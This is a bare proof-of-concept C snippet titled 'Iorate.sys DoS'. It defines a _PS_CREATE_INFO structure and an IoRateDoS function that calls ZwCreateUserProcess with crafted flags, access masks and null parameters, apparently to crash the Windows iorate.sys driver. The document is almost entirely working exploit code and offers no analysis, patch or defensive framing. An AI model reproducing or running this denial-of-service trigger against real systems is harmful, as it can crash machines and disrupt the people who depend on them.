Iorate.sys DoS

POC

struct _PS_CREATE_INFO
{
    ulonglong Size;
    ulonglong State;//at 0x8
    ulong InitFlags;//at 0x10
    ulong AdditionalFileAccess;//at 0x14
    ulonglong X0;
    ulonglong X1;
    ulonglong X2;
    ulonglong X3;
    ulonglong X4;
    ulonglong X5;
    ulonglong X6;
    ulonglong X7;
};
 
 
void IoRateDoS()
{
    //--------- Parameters Start Here ----------
    HANDLE hNewProcess = 0;
    HANDLE hNewThread = 0;
    ulonglong ProcessDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
    ulonglong ThreadDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
    _OBJECT_ATTRIBUTES ObjAttr_p = {sizeof(ObjAttr_p)};
    _OBJECT_ATTRIBUTES ObjAttr_t  = {sizeof(ObjAttr_t)};
    ulonglong ProcessFlagsX = 0x1000;
    ulonglong ThreadFlagsX = 0;
    ulonglong ProcessParametersX =  0;
    _PS_CREATE_INFO PsCreateInfo = {sizeof(PsCreateInfo)};
        PsCreateInfo.InitFlags = PsCreateInitialState;
        PsCreateInfo.AdditionalFileAccess = FILE_EXECUTE;
    ulonglong AttributeListX =  0;
    //---------------
    ulonglong ret = ZwCreateUserProcess(&hNewProcess,&hNewThread,
                        ProcessDesiredAccessX,  ThreadDesiredAccessX,
                        &ObjAttr_p, &ObjAttr_t,
                        ProcessFlagsX,  ThreadFlagsX,
                        (void*)ProcessParametersX,
                        &PsCreateInfo,
                        (void*)AttributeListX);
    printf("ZwCreateUserProcess, ret: %I64X\r\n",ret);
}